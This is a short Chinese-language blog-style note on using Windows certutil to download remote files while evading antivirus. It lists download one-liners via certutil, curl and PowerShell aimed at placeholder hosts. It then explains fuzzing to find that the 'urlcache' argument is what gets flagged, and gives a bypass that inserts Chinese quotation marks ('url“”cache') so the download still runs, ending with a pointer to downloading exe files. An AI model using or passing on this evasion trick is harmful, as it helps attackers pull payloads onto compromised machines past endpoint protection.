certutil绕过杀软
certutil绕过杀软
1.远程文件下载命令
- certutil
1 | certutil && certutil -urlcache -split -f http://xx.xx.xx.xx/test.zip |
- curl
1 | curl http://xx.xx.xx.xx/test.zip -o c:\test.zip |
- powershell
1 | powershell -c "invoke-webrequest -uri http://xx.xx.xx.xx/test.zip -outfile test.zip" |
2.内网常用远程下载命令
- 这里只谈certutil
1 | 怎么进行一个绕过呢,一般直接远程访问资源就会被杀 |
- 用^也会一样被杀
- 双写certutil
fuzz大法看杀软查杀哪一个地方
最终发现查杀的参数为
1
urlcache
3.最终发现,在cmd下面中文的“”也是可以正常执行远程下载资源文件的
1 | certutil && certutil -url“”cache -split -f http://xxx.xxx.xxx/1.txt |
1 | 下载exe文件 |
